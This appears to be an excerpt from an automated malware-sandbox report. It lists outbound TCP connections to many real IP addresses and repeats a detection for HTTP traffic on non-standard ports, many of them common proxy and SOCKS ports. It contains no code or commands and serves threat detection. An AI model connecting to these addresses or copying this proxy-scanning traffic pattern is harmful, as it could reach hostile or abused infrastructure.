Source: global traffic	TCP traffic: 103.87.169.167 ports 0,2,3,32650,5,6
Source: global traffic	TCP traffic: 200.0.247.243 ports 0,1,3,10834,4,8
Source: global traffic	TCP traffic: 43.163.192.3 ports 15673,1,3,5,6,7
Source: global traffic	TCP traffic: 64.227.108.25 ports 31908,0,1,3,8,9
Source: global traffic	TCP traffic: 188.164.196.31 ports 62966,53276,2,3,5,6,7
Source: global traffic	TCP traffic: 38.127.172.169 ports 54291,1,2,4,5,9
Source: global traffic	TCP traffic: 93.158.202.194 ports 0,3,5,6,50673,7
Source: global traffic	TCP traffic: 213.136.78.200 ports 28513,1,40927,2,5,9,19925
Source: global traffic	TCP traffic: 67.43.236.20 ports 15443,8313,15583,27665,19383,24193,32323,29621,24493,31295,31557,22405,23615,18203,20703,22589,22007,1,16829,2,6,31485,9,13377
Source: global traffic	TCP traffic: 67.43.236.21 ports 27665,27687,0,2,5,29059,29477,9
Source: global traffic	TCP traffic: 72.10.164.178 ports 16693,25847,20499,20553,20651,4871,17067,27107,3165,13081,30389,2369,28791,5533,22907,4183,6243,22703,6001,8601,4343,28307,27857,0,2,33125,3,10801,28147,5,23175,14665,32977
Source: global traffic	TCP traffic: 171.244.140.160 ports 42456,15084,36273,2,4,27696,5,6,9537,53749,17525,34559
Source: global traffic	TCP traffic: 162.214.121.11 ports 3549,3,4,5,2993,18809,8989,9,46760
Source: global traffic	TCP traffic: 51.158.64.130 ports 1,3,6,7,9,16379
Source: global traffic	TCP traffic: 93.190.142.57 ports 31280,1,2,3,4,31243,26541
Source: global traffic	TCP traffic: 178.79.141.38 ports 2,3,4,5,6,45263
Source: global traffic	TCP traffic: 167.86.69.142 ports 42214,36394,45364,1,2,4
Source: global traffic	TCP traffic: 162.214.170.144 ports 37592,25347,2,3,5,27510,7,9,39503,31701
Source: global traffic	TCP traffic: 162.241.79.22 ports 0,2,4,5,52048,8,35318
Source: global traffic	TCP traffic: 142.4.7.20 ports 39782,43100,2,3,7,8,9
Source: global traffic	TCP traffic: 91.134.140.160 ports 20896,48962,2572,57320,56495,27207,9141,11946,12217,16487,49687,0,32896,53012,30895,2,3,5,7,5401,8879,51513,39803,49042
Source: global traffic	TCP traffic: 152.70.244.240 ports 1,2,3,6,8,16238
Source: global traffic	TCP traffic: 104.248.151.220 ports 63997,63648,53177,3,4,6,59755,8,52106
Source: global traffic	TCP traffic: 45.81.232.17 ports 25519,30717,61553,59421,27308,9165,54393,0,1,3,53288,7,47056,48085
Source: global traffic	TCP traffic: 103.194.88.107 ports 0,2,3,32650,5,6
Source: global traffic	TCP traffic: 148.72.215.230 ports 4990,44387,3,4,7,8
Source: global traffic	TCP traffic: 8.213.128.90 ports 8002,3129,6,80,6666,11000,7777
Source: global traffic	TCP traffic: 92.205.110.118 ports 7895,3414,26570,5,7,8,9

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 58378
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 37592
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 35774
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 57320
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 58839
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 32896
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 6821
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 9080
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 25697
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 48962
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 37592
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 58378 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 15303
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 35774
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 6693
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 9091
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 10005
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 51616
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 8899
Source: unknown	Network traffic detected: HTTP traffic on port 50164 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 9480
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 32213
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 10005 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 10005 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 58839
Source: unknown	Network traffic detected: HTTP traffic on port 50253 -> 37339
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50140 -> 7302
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 6821
Source: unknown	Network traffic detected: HTTP traffic on port 50293 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 9091 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 50216 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50214 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50240 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50362 -> 5717
Source: unknown	Network traffic detected: HTTP traffic on port 50250 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 50336 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 52980
Source: unknown	Network traffic detected: HTTP traffic on port 50259 -> 9090
Source: unknown	Network traffic detected: HTTP traffic on port 50377 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50442 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 50363 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50299 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 50428 -> 10005
Source: unknown	Network traffic detected: HTTP traffic on port 50361 -> 8193
Source: unknown	Network traffic detected: HTTP traffic on port 50385 -> 26589
Source: unknown	Network traffic detected: HTTP traffic on port 50475 -> 8800
Source: unknown	Network traffic detected: HTTP traffic on port 50374 -> 15303
Source: unknown	Network traffic detected: HTTP traffic on port 50386 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50346 -> 25697
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 9480 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 50236 -> 7302
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 32896
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50293
Source: unknown	Network traffic detected: HTTP traffic on port 50384 -> 16379
Source: unknown	Network traffic detected: HTTP traffic on port 50559 -> 58630
Source: unknown	Network traffic detected: HTTP traffic on port 50431 -> 31280
Source: unknown	Network traffic detected: HTTP traffic on port 6693 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 16379
Source: unknown	Network traffic detected: HTTP traffic on port 50529 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50495 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50637 -> 45108
Source: unknown	Network traffic detected: HTTP traffic on port 50519 -> 25825
Source: unknown	Network traffic detected: HTTP traffic on port 50437 -> 9150
Source: unknown	Network traffic detected: HTTP traffic on port 50555 -> 9764
Source: unknown	Network traffic detected: HTTP traffic on port 50630 -> 64767
Source: unknown	Network traffic detected: HTTP traffic on port 50469 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 50619 -> 31794
Source: unknown	Network traffic detected: HTTP traffic on port 50411 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 49547
Source: unknown	Network traffic detected: HTTP traffic on port 50608 -> 16691
Source: unknown	Network traffic detected: HTTP traffic on port 8800 -> 50475
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 35774
Source: unknown	Network traffic detected: HTTP traffic on port 10005 -> 50428
Source: unknown	Network traffic detected: HTTP traffic on port 10005 -> 50428
Source: unknown	Network traffic detected: HTTP traffic on port 50465 -> 12446
Source: unknown	Network traffic detected: HTTP traffic on port 50514 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50521 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50377
Source: unknown	Network traffic detected: HTTP traffic on port 50526 -> 53948
Source: unknown	Network traffic detected: HTTP traffic on port 50689 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 7302 -> 50140
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 9045
Source: unknown	Network traffic detected: HTTP traffic on port 50643 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50520 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50538 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 1981
Source: unknown	Network traffic detected: HTTP traffic on port 50535 -> 25843
Source: unknown	Network traffic detected: HTTP traffic on port 50561 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 1080 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 50714 -> 58378
Source: unknown	Network traffic detected: HTTP traffic on port 50612 -> 10010
Source: unknown	Network traffic detected: HTTP traffic on port 50589 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50653 -> 20551
Source: unknown	Network traffic detected: HTTP traffic on port 50571 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50164
Source: unknown	Network traffic detected: HTTP traffic on port 50624 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 50588 -> 20000
Source: unknown	Network traffic detected: HTTP traffic on port 50712 -> 18080
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 82
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 50253 -> 37339
Source: unknown	Network traffic detected: HTTP traffic on port 50679 -> 31243
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50363
Source: unknown	Network traffic detected: HTTP traffic on port 50807 -> 20816
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50728 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50672 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 50681 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 51616
Source: unknown	Network traffic detected: HTTP traffic on port 50848 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50797 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 50706 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 5443
Source: unknown	Network traffic detected: HTTP traffic on port 50727 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 50738 -> 9091
Source: unknown	Network traffic detected: HTTP traffic on port 50751 -> 5566
Source: unknown	Network traffic detected: HTTP traffic on port 50713 -> 6446
Source: unknown	Network traffic detected: HTTP traffic on port 50949 -> 61464
Source: unknown	Network traffic detected: HTTP traffic on port 8899 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 32213
Source: unknown	Network traffic detected: HTTP traffic on port 50707 -> 9537
Source: unknown	Network traffic detected: HTTP traffic on port 50944 -> 43100
Source: unknown	Network traffic detected: HTTP traffic on port 50607 -> 9002
Source: unknown	Network traffic detected: HTTP traffic on port 50998 -> 58507
Source: unknown	Network traffic detected: HTTP traffic on port 50950 -> 47585
Source: unknown	Network traffic detected: HTTP traffic on port 50909 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50788 -> 9002
Source: unknown	Network traffic detected: HTTP traffic on port 50790 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50771 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50942 -> 26589
Source: unknown	Network traffic detected: HTTP traffic on port 50878 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50748 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50469
Source: unknown	Network traffic detected: HTTP traffic on port 50908 -> 30277
Source: unknown	Network traffic detected: HTTP traffic on port 50913 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50362 -> 5717
Source: unknown	Network traffic detected: HTTP traffic on port 50827 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 50868 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 16379 -> 50384
Source: unknown	Network traffic detected: HTTP traffic on port 51012 -> 5050
Source: unknown	Network traffic detected: HTTP traffic on port 58378 -> 50714
Source: unknown	Network traffic detected: HTTP traffic on port 50863 -> 9050
Source: unknown	Network traffic detected: HTTP traffic on port 50965 -> 31654
Source: unknown	Network traffic detected: HTTP traffic on port 50882 -> 135
Source: unknown	Network traffic detected: HTTP traffic on port 50899 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 6821
Source: unknown	Network traffic detected: HTTP traffic on port 50927 -> 10006
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50386
Source: unknown	Network traffic detected: HTTP traffic on port 50904 -> 35760
Source: unknown	Network traffic detected: HTTP traffic on port 50953 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50900 -> 1081
Source: unknown	Network traffic detected: HTTP traffic on port 50831 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 58839
Source: unknown	Network traffic detected: HTTP traffic on port 50859 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 50946 -> 26591
Source: unknown	Network traffic detected: HTTP traffic on port 50979 -> 5566
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 20614
Source: unknown	Network traffic detected: HTTP traffic on port 10010 -> 50612
Source: unknown	Network traffic detected: HTTP traffic on port 18080 -> 50712
Source: unknown	Network traffic detected: HTTP traffic on port 20551 -> 50653
Source: unknown	Network traffic detected: HTTP traffic on port 50910 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 51161 -> 54395
Source: unknown	Network traffic detected: HTTP traffic on port 50972 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 3389
Source: unknown	Network traffic detected: HTTP traffic on port 50989 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 50938 -> 7302
Source: unknown	Network traffic detected: HTTP traffic on port 51054 -> 5767
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 7895
Source: unknown	Network traffic detected: HTTP traffic on port 51002 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 50559 -> 58630
Source: unknown	Network traffic detected: HTTP traffic on port 51061 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51196 -> 9764
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50589
Source: unknown	Network traffic detected: HTTP traffic on port 31243 -> 50679
Source: unknown	Network traffic detected: HTTP traffic on port 51031 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51001 -> 4153
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50630 -> 64767
Source: unknown	Network traffic detected: HTTP traffic on port 50214 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51060 -> 5630
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 48664
Source: unknown	Network traffic detected: HTTP traffic on port 51108 -> 8193
Source: unknown	Network traffic detected: HTTP traffic on port 51140 -> 10007
Source: unknown	Network traffic detected: HTTP traffic on port 51229 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 51007 -> 9002
Source: unknown	Network traffic detected: HTTP traffic on port 51266 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51107 -> 5005
Source: unknown	Network traffic detected: HTTP traffic on port 51071 -> 228
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50728
Source: unknown	Network traffic detected: HTTP traffic on port 51073 -> 128
Source: unknown	Network traffic detected: HTTP traffic on port 51183 -> 6969
Source: unknown	Network traffic detected: HTTP traffic on port 51166 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 50977 -> 10800
Source: unknown	Network traffic detected: HTTP traffic on port 51232 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51317 -> 2453
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50619 -> 31794
Source: unknown	Network traffic detected: HTTP traffic on port 51280 -> 49547
Source: unknown	Network traffic detected: HTTP traffic on port 51191 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 51194 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51079 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 1081
Source: unknown	Network traffic detected: HTTP traffic on port 51245 -> 9401
Source: unknown	Network traffic detected: HTTP traffic on port 51195 -> 25697
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 50985 -> 63997
Source: unknown	Network traffic detected: HTTP traffic on port 50608 -> 16691
Source: unknown	Network traffic detected: HTTP traffic on port 50440 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 50727
Source: unknown	Network traffic detected: HTTP traffic on port 51247 -> 31280
Source: unknown	Network traffic detected: HTTP traffic on port 51215 -> 41890
Source: unknown	Network traffic detected: HTTP traffic on port 9091 -> 50738
Source: unknown	Network traffic detected: HTTP traffic on port 51251 -> 8197
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 6522
Source: unknown	Network traffic detected: HTTP traffic on port 51296 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 9002 -> 50788
Source: unknown	Network traffic detected: HTTP traffic on port 51235 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 51226 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 20000 -> 50588
Source: unknown	Network traffic detected: HTTP traffic on port 51281 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50868
Source: unknown	Network traffic detected: HTTP traffic on port 51242 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 10006 -> 50927
Source: unknown	Network traffic detected: HTTP traffic on port 51293 -> 9123
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 42214
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50771
Source: unknown	Network traffic detected: HTTP traffic on port 51305 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50899
Source: unknown	Network traffic detected: HTTP traffic on port 50162 -> 1337
Source: unknown	Network traffic detected: HTTP traffic on port 51113 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50953
Source: unknown	Network traffic detected: HTTP traffic on port 50280 -> 64353
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 50748
Source: unknown	Network traffic detected: HTTP traffic on port 51355 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 18877
Source: unknown	Network traffic detected: HTTP traffic on port 9002 -> 50607
Source: unknown	Network traffic detected: HTTP traffic on port 51276 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50268 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 1976
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 9002
Source: unknown	Network traffic detected: HTTP traffic on port 51327 -> 28513
Source: unknown	Network traffic detected: HTTP traffic on port 50949 -> 61464
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 51266
Source: unknown	Network traffic detected: HTTP traffic on port 51319 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51377 -> 26589
Source: unknown	Network traffic detected: HTTP traffic on port 50219 -> 16113
Source: unknown	Network traffic detected: HTTP traffic on port 5566 -> 50979
Source: unknown	Network traffic detected: HTTP traffic on port 50950 -> 47585
Source: unknown	Network traffic detected: HTTP traffic on port 51309 -> 9002
Source: unknown	Network traffic detected: HTTP traffic on port 51338 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 51369 -> 31679
Source: unknown	Network traffic detected: HTTP traffic on port 50944 -> 43100
Source: unknown	Network traffic detected: HTTP traffic on port 50998 -> 58507
Source: unknown	Network traffic detected: HTTP traffic on port 50465 -> 12446
Source: unknown	Network traffic detected: HTTP traffic on port 50526 -> 53948
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 51061
Source: unknown	Network traffic detected: HTTP traffic on port 50253 -> 37339
Source: unknown	Network traffic detected: HTTP traffic on port 1080 -> 50831
Source: unknown	Network traffic detected: HTTP traffic on port 7302 -> 50938
Source: unknown	Network traffic detected: HTTP traffic on port 10007 -> 51140
Source: unknown	Network traffic detected: HTTP traffic on port 9401 -> 51245
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 51166
Source: unknown	Network traffic detected: HTTP traffic on port 51336 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 51376 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51353 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51352 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 51359 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 50278 -> 42380
Source: unknown	Network traffic detected: HTTP traffic on port 51368 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51403 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51412 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50350 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50329 -> 16379
Source: unknown	Network traffic detected: HTTP traffic on port 50424 -> 62607
Source: unknown	Network traffic detected: HTTP traffic on port 50343 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 50249 -> 48962
Source: unknown	Network traffic detected: HTTP traffic on port 6446 -> 50713
Source: unknown	Network traffic detected: HTTP traffic on port 50372 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51371 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 51379 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 51424 -> 31654
Source: unknown	Network traffic detected: HTTP traffic on port 51365 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51325 -> 7302
Source: unknown	Network traffic detected: HTTP traffic on port 9002 -> 51007
Source: unknown	Network traffic detected: HTTP traffic on port 128 -> 51073
Source: unknown	Network traffic detected: HTTP traffic on port 50706 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 5767 -> 51054
Source: unknown	Network traffic detected: HTTP traffic on port 8081 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 51281
Source: unknown	Network traffic detected: HTTP traffic on port 9123 -> 51293
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 51305
Source: unknown	Network traffic detected: HTTP traffic on port 51317 -> 2453
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 51242
Source: unknown	Network traffic detected: HTTP traffic on port 50362 -> 5717
Source: unknown	Network traffic detected: HTTP traffic on port 50707 -> 9537
Source: unknown	Network traffic detected: HTTP traffic on port 50559 -> 58630
Source: unknown	Network traffic detected: HTTP traffic on port 50630 -> 64767
Source: unknown	Network traffic detected: HTTP traffic on port 3128 -> 50529
Source: unknown	Network traffic detected: HTTP traffic on port 50904 -> 35760
Source: unknown	Network traffic detected: HTTP traffic on port 9002 -> 51309
Source: unknown	Network traffic detected: HTTP traffic on port 51002 -> 55555
Source: unknown	Network traffic detected: HTTP traffic on port 9002 -> 51248
Source: unknown	Network traffic detected: HTTP traffic on port 50619 -> 31794
Source: unknown	Network traffic detected: HTTP traffic on port 51444 -> 9764
Source: unknown	Network traffic detected: HTTP traffic on port 50391 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51060 -> 5630
Source: unknown	Network traffic detected: HTTP traffic on port 50314 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 50446 -> 57745
Source: unknown	Network traffic detected: HTTP traffic on port 51452 -> 8123
Source: unknown	Network traffic detected: HTTP traffic on port 51436 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 51107 -> 5005
Source: unknown	Network traffic detected: HTTP traffic on port 50910 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 51469 -> 31034
Source: unknown	Network traffic detected: HTTP traffic on port 50581 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51474 -> 10010
Source: unknown	Network traffic detected: HTTP traffic on port 50663 -> 44499
Source: unknown	Network traffic detected: HTTP traffic on port 50540 -> 16238
Source: unknown	Network traffic detected: HTTP traffic on port 51455 -> 8520
Source: unknown	Network traffic detected: HTTP traffic on port 51473 -> 8123
Source: unknown	Network traffic detected: HTTP traffic on port 51528 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 51113
Source: unknown	Network traffic detected: HTTP traffic on port 51470 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 50670 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50780 -> 37445
Source: unknown	Network traffic detected: HTTP traffic on port 50759 -> 59991
Source: unknown	Network traffic detected: HTTP traffic on port 51529 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51532 -> 49547
Source: unknown	Network traffic detected: HTTP traffic on port 51536 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50686 -> 16379
Source: unknown	Network traffic detected: HTTP traffic on port 51527 -> 8193
Source: unknown	Network traffic detected: HTTP traffic on port 51541 -> 8197
Source: unknown	Network traffic detected: HTTP traffic on port 51485 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 51531 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51525 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 51550 -> 6087
Source: unknown	Network traffic detected: HTTP traffic on port 51526 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 51545 -> 1082
Source: unknown	Network traffic detected: HTTP traffic on port 51538 -> 15673
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 51616
Source: unknown	Network traffic detected: HTTP traffic on port 50608 -> 16691
Source: unknown	Network traffic detected: HTTP traffic on port 51511 -> 1080
Source: unknown	Network traffic detected: HTTP traffic on port 51530 -> 3389
Source: unknown	Network traffic detected: HTTP traffic on port 51546 -> 9400
Source: unknown	Network traffic detected: HTTP traffic on port 51533 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 31908
Source: unknown	Network traffic detected: HTTP traffic on port 51542 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 50949 -> 61464
Source: unknown	Network traffic detected: HTTP traffic on port 51567 -> 5811
Source: unknown	Network traffic detected: HTTP traffic on port 5443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 51535 -> 4153
Source: unknown	Network traffic detected: HTTP traffic on port 50950 -> 47585
Source: unknown	Network traffic detected: HTTP traffic on port 51569 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 51226 -> 3128
Source: unknown	Network traffic detected: HTTP traffic on port 51215 -> 41890
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 35774
Source: unknown	Network traffic detected: HTTP traffic on port 50998 -> 58507
Source: unknown	Network traffic detected: HTTP traffic on port 51289 -> 4145
Source: unknown	Network traffic detected: HTTP traffic on port 50944 -> 43100
Source: unknown	Network traffic detected: HTTP traffic on port 50906 -> 31653
Source: unknown	Network traffic detected: HTTP traffic on port 50872 -> 16379
Source: unknown	Network traffic detected: HTTP traffic on port 7302 -> 51325
Source: unknown	Network traffic detected: HTTP traffic on port 51574 -> 7890
Source: unknown	Network traffic detected: HTTP traffic on port 51145 -> 60589
